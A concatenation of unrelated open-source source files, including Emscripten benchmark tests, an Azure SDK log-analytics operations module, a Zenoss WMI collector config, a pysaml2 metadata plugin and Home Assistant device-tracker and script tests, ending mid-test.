default: printf("error: %d\\n", arg); return -1;
}
int x = 0;
for (int j = 0; j < 27000; j++) {
for (int i = 0; i < arg; i++) {
if (((x*x+11) % 3 == 0) | ((x*(x+2)+17) % 5 == 0)) {
x += 2;
} else {
x++;
}
}
}
printf("ok %d\n", x);
return x;
}
'''
self.do_benchmark('conditionals', src, 'ok', reps=TEST_REPS*5)
def test_fannkuch(self):
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read().replace(
'int n = argc > 1 ? atoi(argv[1]) : 0;',
'''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 9; break;
case 2: n = 10; break;
case 3: n = 11; break;
case 4: n = 11; break;
case 5: n = 12; break;
default: printf("error: %d\\n", arg); return -1;
}
'''
)
assert 'switch(arg)' in src
self.do_benchmark('fannkuch', src, 'Pfannkuchen(')
def test_corrections(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 20000; M = 550; break;
case 2: N = 20000; M = 3500; break;
case 3: N = 20000; M = 7000; break;
case 4: N = 20000; M = 5*7000; break;
case 5: N = 20000; M = 10*7000; break;
default: printf("error: %d\\n", arg); return -1;
}
unsigned int f = 0;
unsigned short s = 0;
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++) {
f += i / ((t % 5)+1);
if (f > 1000) f /= (t % 3)+1;
if (i % 4 == 0) f += i * (i % 8 == 0 ? 1 : -1);
s += (short(f)*short(f)) % 256;
}
}
printf("final: %d:%d.\n", f, s);
return 0;
}
'''
self.do_benchmark('corrections', src, 'final:', emcc_args=['-s', 'CORRECT_SIGNS=1', '-s', 'CORRECT_OVERFLOWS=1', '-s', 'CORRECT_ROUNDINGS=1'])
def fasta(self, name, double_rep, emcc_args=[]):
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read().replace('double', double_rep)
src = src.replace(' const size_t n = ( argc > 1 ) ? atoi( argv[1] ) : 512;', '''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 19000000/20; break;
case 2: n = 19000000/2; break;
case 3: n = 19000000; break;
case 4: n = 19000000*5; break;
case 5: n = 19000000*10; break;
default: printf("error: %d\\n", arg); return -1;
}
''')
assert 'switch(arg)' in src
self.do_benchmark('fasta', src, '')
def test_fasta_float(self):
self.fasta('fasta_float', 'float')
def test_fasta_double(self):
if CORE_BENCHMARKS: return
self.fasta('fasta_double', 'double')
def test_fasta_double_full(self):
if CORE_BENCHMARKS: return
self.fasta('fasta_double_full', 'double', emcc_args=['-s', 'DOUBLE_MODE=1'])
def test_skinning(self):
src = open(path_from_root('tests', 'skinning_test_no_simd.cpp'), 'r').read()
self.do_benchmark('skinning', src, 'blah=0.000000')
def test_life(self):
if CORE_BENCHMARKS: return
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_benchmark('life', src, '''--------------------------------''', shared_args=['-std=c99'], force_c=True)
def test_linpack_double(self):
if CORE_BENCHMARKS: return
def output_parser(output):
return 100.0/float(re.search('Unrolled Double Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack_double', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Double Precision''', force_c=True, output_parser=output_parser)
def test_linpack_float(self): # TODO: investigate if this might benefit from -ffast-math in LLVM 3.3+ which has fast math stuff in LLVM IR
def output_parser(output):
return 100.0/float(re.search('Unrolled Single Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack_float', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Single Precision''', force_c=True, output_parser=output_parser, shared_args=['-DSP'])
def test_zzz_java_nbody(self): # tests xmlvm compiled java, including bitcasts of doubles, i64 math, etc.
if CORE_BENCHMARKS: return
args = [path_from_root('tests', 'nbody-java', x) for x in os.listdir(path_from_root('tests', 'nbody-java')) if x.endswith('.c')] + \
['-I' + path_from_root('tests', 'nbody-java')]
self.do_benchmark('nbody_java', '', '''Time(s)''',
force_c=True, emcc_args=args + ['-s', 'PRECISE_I64_MATH=1', '--llvm-lto', '2'], native_args=args + ['-lgc', '-std=c99', '-target', 'x86_64-pc-linux-gnu', '-lm'])
def lua(self, benchmark, expected, output_parser=None, args_processor=None):
shutil.copyfile(path_from_root('tests', 'lua', benchmark + '.lua'), benchmark + '.lua')
def lib_builder(name, native, env_init):
ret = self.get_library('lua_native' if native else 'lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None, native=native, cache_name_extra=name, env_init=env_init)
if native: return ret
shutil.copyfile(ret[0], ret[0] + '.bc')
ret[0] += '.bc'
return ret
self.do_benchmark('lua_' + benchmark, '', expected,
force_c=True, args=[benchmark + '.lua', DEFAULT_ARG], emcc_args=['--embed-file', benchmark + '.lua'],
lib_builder=lib_builder, native_exec=os.path.join('building', 'lua_native', 'src', 'lua'),
output_parser=output_parser, args_processor=args_processor)
def test_zzz_lua_scimark(self):
def output_parser(output):
return 100.0/float(re.search('\nSciMark +([\d\.]+) ', output).group(1))
self.lua('scimark', '[small problem sizes]', output_parser=output_parser)
def test_zzz_lua_binarytrees(self):
# js version: ['binarytrees.lua', {0: 0, 1: 9.5, 2: 11.99, 3: 12.85, 4: 14.72, 5: 15.82}[arguments[0]]]
self.lua('binarytrees', 'long lived tree of depth')
def test_zzz_zlib(self):
src = open(path_from_root('tests', 'zlib', 'benchmark.c'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a'], native=native, cache_name_extra=name, env_init=env_init)
self.do_benchmark('zlib', src, '''ok.''',
force_c=True, shared_args=['-I' + path_from_root('tests', 'zlib')], lib_builder=lib_builder)
def test_zzz_box2d(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'box2d', 'Benchmark.cpp'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('box2d', [os.path.join('box2d.a')], configure=None, native=native, cache_name_extra=name, env_init=env_init)
self.do_benchmark('box2d', src, 'frame averages', shared_args=['-I' + path_from_root('tests', 'box2d')], lib_builder=lib_builder)
def test_zzz_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'BenchmarkDemo.cpp'), 'r').read() + \
open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'main.cpp'), 'r').read()
def lib_builder(name, native, env_init):
return self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'], native=native, cache_name_extra=name, env_init=env_init)
emcc_args = ['-s', 'DEAD_FUNCTIONS=["__ZSt9terminatev"]']
self.do_benchmark('bullet', src, '\nok.\n', emcc_args=emcc_args, shared_args=['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks')], lib_builder=lib_builder)
| slightperturbation/Cobalt | ext/emsdk_portable/emscripten/1.27.0/tests/test_benchmark.py | Python | apache-2.0 | 23,045 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_export_request_rate_by_interval_request_initial(
location: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2019-03-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval')
path_format_arguments = {
"location": _SERIALIZER.url("location", location, 'str', pattern=r'^[-\w\._]+$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_export_throttled_requests_request_initial(
location: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2019-03-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests')
path_format_arguments = {
"location": _SERIALIZER.url("location", location, 'str', pattern=r'^[-\w\._]+$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
class LogAnalyticsOperations(object):
"""LogAnalyticsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2019_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _export_request_rate_by_interval_initial(
self,
location: str,
parameters: "_models.RequestRateByIntervalInput",
**kwargs: Any
) -> Optional["_models.LogAnalyticsOperationResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.LogAnalyticsOperationResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'RequestRateByIntervalInput')
request = build_export_request_rate_by_interval_request_initial(
location=location,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._export_request_rate_by_interval_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_export_request_rate_by_interval_initial.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval'} # type: ignore
@distributed_trace
def begin_export_request_rate_by_interval(
self,
location: str,
parameters: "_models.RequestRateByIntervalInput",
**kwargs: Any
) -> LROPoller["_models.LogAnalyticsOperationResult"]:
"""Export logs that show Api requests made by this subscription in the given time window to show
throttling activities.
:param location: The location upon which virtual-machine-sizes is queried.
:type location: str
:param parameters: Parameters supplied to the LogAnalytics getRequestRateByInterval Api.
:type parameters: ~azure.mgmt.compute.v2019_03_01.models.RequestRateByIntervalInput
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either LogAnalyticsOperationResult or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2019_03_01.models.LogAnalyticsOperationResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.LogAnalyticsOperationResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._export_request_rate_by_interval_initial(
location=location,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_export_request_rate_by_interval.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getRequestRateByInterval'} # type: ignore
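    # Hypothetical usage sketch (the model field and enum names are
    # assumptions for this API version and may differ):
    #   from azure.identity import DefaultAzureCredential
    #   from azure.mgmt.compute import ComputeManagementClient
    #   client = ComputeManagementClient(DefaultAzureCredential(), subscription_id)
    #   poller = client.log_analytics.begin_export_request_rate_by_interval(
    #       location="westus",
    #       parameters=models.RequestRateByIntervalInput(
    #           blob_container_sas_uri="<sas-uri>",
    #           from_property=start_time, to=end_time,
    #           interval_length=models.IntervalInMins.FIVE_MINS))
    #   result = poller.result()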
def _export_throttled_requests_initial(
self,
location: str,
parameters: "_models.ThrottledRequestsInput",
**kwargs: Any
) -> Optional["_models.LogAnalyticsOperationResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.LogAnalyticsOperationResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ThrottledRequestsInput')
request = build_export_throttled_requests_request_initial(
location=location,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._export_throttled_requests_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_export_throttled_requests_initial.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests'} # type: ignore
@distributed_trace
def begin_export_throttled_requests(
self,
location: str,
parameters: "_models.ThrottledRequestsInput",
**kwargs: Any
) -> LROPoller["_models.LogAnalyticsOperationResult"]:
"""Export logs that show total throttled Api requests for this subscription in the given time
window.
:param location: The location upon which virtual-machine-sizes is queried.
:type location: str
:param parameters: Parameters supplied to the LogAnalytics getThrottledRequests Api.
:type parameters: ~azure.mgmt.compute.v2019_03_01.models.ThrottledRequestsInput
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either LogAnalyticsOperationResult or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.compute.v2019_03_01.models.LogAnalyticsOperationResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.LogAnalyticsOperationResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._export_throttled_requests_initial(
location=location,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('LogAnalyticsOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_export_throttled_requests.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/locations/{location}/logAnalytics/apiAccess/getThrottledRequests'} # type: ignore
| Azure/azure-sdk-for-python | sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/operations/_log_analytics_operations.py | Python | mit | 16,337 |
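A minimal calling sketch for the poller-based export operations above. The client construction, subscription id, SAS URI, and time window are placeholder assumptions, and the model field names follow the v2019_03_01 models referenced in the docstring:

import datetime
from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.compute.v2019_03_01.models import ThrottledRequestsInput

client = ComputeManagementClient(DefaultAzureCredential(), "<subscription-id>")
params = ThrottledRequestsInput(
    blob_container_sas_uri="<writable-container-sas-uri>",  # placeholder
    from_time=datetime.datetime(2019, 3, 1),
    to_time=datetime.datetime(2019, 3, 2),
)
poller = client.log_analytics.begin_export_throttled_requests("westus", params)
result = poller.result()  # blocks until the export completes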
################################################################################
#
# This program is part of the WMIDataSource Zenpack for Zenoss.
# Copyright (C) 2008, 2009, 2010 Egor Puzanov.
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
################################################################################
__doc__="""WmiPerfConfig
Provides Wmi config to zenperfwmi clients.
$Id: WmiPerfConfig.py,v 2.8 2010/05/20 21:29:16 egor Exp $"""
__version__ = "$Revision: 2.8 $"[11:-2]
from Products.ZenCollector.services.config import CollectorConfigService
from Products.ZenUtils.ZenTales import talesEval
import logging
log = logging.getLogger('zen.ModelerService.WmiPerfConfig')
def sortQuery(qs, table, query):
cn, kbs, ns, props = query
if not kbs: kbs = {}
ikey = tuple(kbs.keys())
ival = tuple(kbs.values())
    # {namespace: {classname: {keybinding names: {keybinding values: [(table, props), ...]}}}}
    branch = qs.setdefault(ns, {}).setdefault(cn, {}).setdefault(ikey, {})
    branch.setdefault(ival, []).append((table, props))
return qs
def getWbemComponentConfig(transports, comp, queries, datapoints):
threshs = []
basepath = comp.rrdPath()
perfServer = comp.device().getPerformanceServer()
for templ in comp.getRRDTemplates():
names = []
datasources = []
for tr in transports:
datasources.extend(templ.getRRDDataSources(tr))
for ds in datasources:
if not ds.enabled: continue
transport, classname, kb, namespace = ds.getInstanceInfo(comp)
if transport != transports[0]: continue
qid = comp.id + "_" + templ.id + "_" + ds.id
datapoints[qid] = []
properties = {}
compname = comp.meta_type == "Device" and "" or comp.id
for dp in ds.getRRDDataPoints():
if len(dp.aliases()) > 0:
alias = dp.aliases()[0].id.strip()
expr = talesEval("string:%s"%dp.aliases()[0].formula, comp,
extra={'now':'now'})
else:
alias = dp.id.strip()
expr = None
if alias not in properties: properties[alias] = (dp.id,)
else: properties[alias] = properties[alias] + (dp.id,)
dpname = dp.name()
names.append(dpname)
datapoints[qid].append((dp.id,
compname,
expr,
"/".join((basepath, dpname)),
dp.rrdtype,
dp.getRRDCreateCommand(perfServer),
(dp.rrdmin, dp.rrdmax)))
queries = sortQuery(queries,qid,(classname,kb,namespace,properties))
for threshold in templ.thresholds():
if not threshold.enabled: continue
for ds in threshold.dsnames:
if ds not in names: continue
threshs.append(threshold.createThresholdInstance(comp))
break
return threshs
def getWbemDeviceConfig(trs, device):
queries = {}
datapoints = {}
threshs = getWbemComponentConfig(trs, device, queries, datapoints)
for comp in device.getMonitoredComponents():
threshs.extend(getWbemComponentConfig(trs, comp, queries, datapoints))
return queries, datapoints, threshs
class WmiPerfConfig(CollectorConfigService):
def __init__(self, dmd, instance):
self.cimtransport = ['WMI', 'CIM']
deviceProxyAttributes = ('zWmiMonitorIgnore',
'zWmiProxy',
'zWinUser',
'zWinPassword')
CollectorConfigService.__init__(self, dmd, instance,
deviceProxyAttributes)
def _filterDevice(self, device):
include = CollectorConfigService._filterDevice(self, device)
zIgnore = 'z%s%sMonitorIgnore'%(self.cimtransport[0][0].upper(),
self.cimtransport[0][1:].lower())
if getattr(device, zIgnore, False):
log.debug("Device %s skipped because %s is True", device.id,zIgnore)
include = False
return include
def _createDeviceProxy(self, device):
proxy = CollectorConfigService._createDeviceProxy(self, device)
# for now, every device gets a single configCycleInterval based upon
# the collector's winCycleInterval configuration which is typically
# located at dmd.Monitors.Performance._getOb('localhost').
# TODO: create a zProperty that allows for individual device schedules
proxy.configCycleInterval = self._prefs.perfsnmpCycleInterval
proxy.queries, proxy.datapoints, proxy.thresholds = getWbemDeviceConfig(
self.cimtransport,
device)
if not proxy.queries:
log.debug("Device %s skipped because there are no datasources",
device.getId())
return None
return proxy
| anksp21/Community-Zenpacks | ZenPacks.community.WMIDataSource/ZenPacks/community/WMIDataSource/services/WmiPerfConfig.py | Python | gpl-2.0 | 5,653 |
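A small illustration of the nested structure sortQuery builds, using the function defined above; the table name, keybindings, and properties are invented:

qs = {}
qs = sortQuery(qs, 'devA_templ_ds1',
               ('Win32_PerfRawData', {'Name': 'C:'}, 'root/cimv2',
                {'FreeSpace': ('freeMB',)}))
# qs == {'root/cimv2': {'Win32_PerfRawData': {('Name',): {('C:',):
#        [('devA_templ_ds1', {'FreeSpace': ('freeMB',)})]}}}}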
import ConfigParser
from zope.interface import implements
# from repoze.who.interfaces import IChallenger, IIdentifier, IAuthenticator
from repoze.who.interfaces import IMetadataProvider
class INIMetadataProvider(object):
implements(IMetadataProvider)
def __init__(self, ini_file, key_attribute):
self.users = ConfigParser.ConfigParser()
self.users.readfp(open(ini_file))
self.key_attribute = key_attribute
def add_metadata(self, _environ, identity):
# logger = environ.get('repoze.who.logger','')
key = identity.get("repoze.who.userid")
try:
if self.key_attribute:
for sec in self.users.sections():
if self.users.has_option(sec, self.key_attribute):
if key in self.users.get(sec, self.key_attribute):
identity["user"] = dict(self.users.items(sec))
break
else:
identity["user"] = dict(self.users.items(key))
except ValueError:
pass
def make_plugin(ini_file, key_attribute=""):
return INIMetadataProvider(ini_file, key_attribute)
| cloudera/hue | desktop/core/ext-py3/pysaml2-5.0.0/src/saml2/s2repoze/plugins/ini.py | Python | apache-2.0 | 1,180 |
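A sketch of how the plugin is wired up; the INI layout below is invented to match what add_metadata expects when key_attribute is empty:

# users.ini (hypothetical):
#   [alice]
#   cn = Alice Example
#   mail = alice@example.org
plugin = make_plugin("users.ini")
identity = {"repoze.who.userid": "alice"}
plugin.add_metadata({}, identity)
# identity["user"] == {"cn": "Alice Example", "mail": "alice@example.org"}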
"""
Support for ASUSWRT routers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.asuswrt/
"""
import logging
from homeassistant.components.device_tracker import DeviceScanner
from . import DATA_ASUSWRT
DEPENDENCIES = ['asuswrt']
_LOGGER = logging.getLogger(__name__)
async def async_get_scanner(hass, config):
"""Validate the configuration and return an ASUS-WRT scanner."""
scanner = AsusWrtDeviceScanner(hass.data[DATA_ASUSWRT])
await scanner.async_connect()
return scanner if scanner.success_init else None
class AsusWrtDeviceScanner(DeviceScanner):
"""This class queries a router running ASUSWRT firmware."""
# Eighth attribute needed for mode (AP mode vs router mode)
def __init__(self, api):
"""Initialize the scanner."""
self.last_results = {}
self.success_init = False
self.connection = api
async def async_connect(self):
"""Initialize connection to the router."""
# Test the router is accessible.
data = await self.connection.async_get_connected_devices()
self.success_init = data is not None
async def async_scan_devices(self):
"""Scan for new devices and return a list with found device IDs."""
await self.async_update_info()
return list(self.last_results.keys())
async def async_get_device_name(self, device):
"""Return the name of the given device or None if we don't know."""
if device not in self.last_results:
return None
return self.last_results[device].name
async def async_update_info(self):
"""Ensure the information from the ASUSWRT router is up to date.
Return boolean if scanning successful.
"""
_LOGGER.info('Checking Devices')
self.last_results = await self.connection.async_get_connected_devices()
| jamespcole/home-assistant | homeassistant/components/asuswrt/device_tracker.py | Python | apache-2.0 | 1,927 |
"""The tests for the Script component."""
# pylint: disable=protected-access
from datetime import timedelta
from unittest import mock
import unittest
from homeassistant.core import callback
# Otherwise can't test just this file (import order issue)
import homeassistant.components # noqa
import homeassistant.util.dt as dt_util
from homeassistant.helpers import script, config_validation as cv
from tests.common import fire_time_changed, get_test_home_assistant
ENTITY_ID = 'script.test'
class TestScriptHelper(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_firing_event(self):
"""Test the firing of events."""
event = 'test_event'
calls = []
@callback
def record_event(event):
"""Add recorded event to set."""
calls.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA({
'event': event,
'event_data': {
'hello': 'world'
}
}))
script_obj.run()
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
assert not script_obj.can_cancel
def test_calling_service(self):
"""Test the calling of a service."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script.call_from_config(self.hass, {
'service': 'test.script',
'data': {
'hello': 'world'
}
})
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
def test_calling_service_template(self):
"""Test the calling of a service."""
calls = []
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register('test', 'script', record_call)
script.call_from_config(self.hass, {
'service_template': """
{% if True %}
test.script
{% else %}
test.not_script
{% endif %}""",
'data_template': {
'hello': """
{% if True %}
world
{% else %}
Not world
{% endif %}
"""
}
})
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].data.get('hello') == 'world'
def test_delay(self):
"""Test the delay."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{'delay': {'seconds': 5}},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert script_obj.can_cancel
assert script_obj.last_action == event
assert len(events) == 1
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 2
def test_delay_template(self):
"""Test the delay as a template."""
        event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
script_obj = script.Script(self.hass, cv.SCRIPT_SCHEMA([
{'event': event},
{'delay': '00:00:{{ 5 }}'},
{'event': event}]))
script_obj.run()
self.hass.block_till_done()
assert script_obj.is_running
assert script_obj.can_cancel
assert script_obj.last_action == event
assert len(events) == 1
future = dt_util.utcnow() + timedelta(seconds=5)
fire_time_changed(self.hass, future)
self.hass.block_till_done()
assert not script_obj.is_running
assert len(events) == 2
def test_cancel_while_delay(self):
"""Test the cancelling while the delay is present."""
event = 'test_event'
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
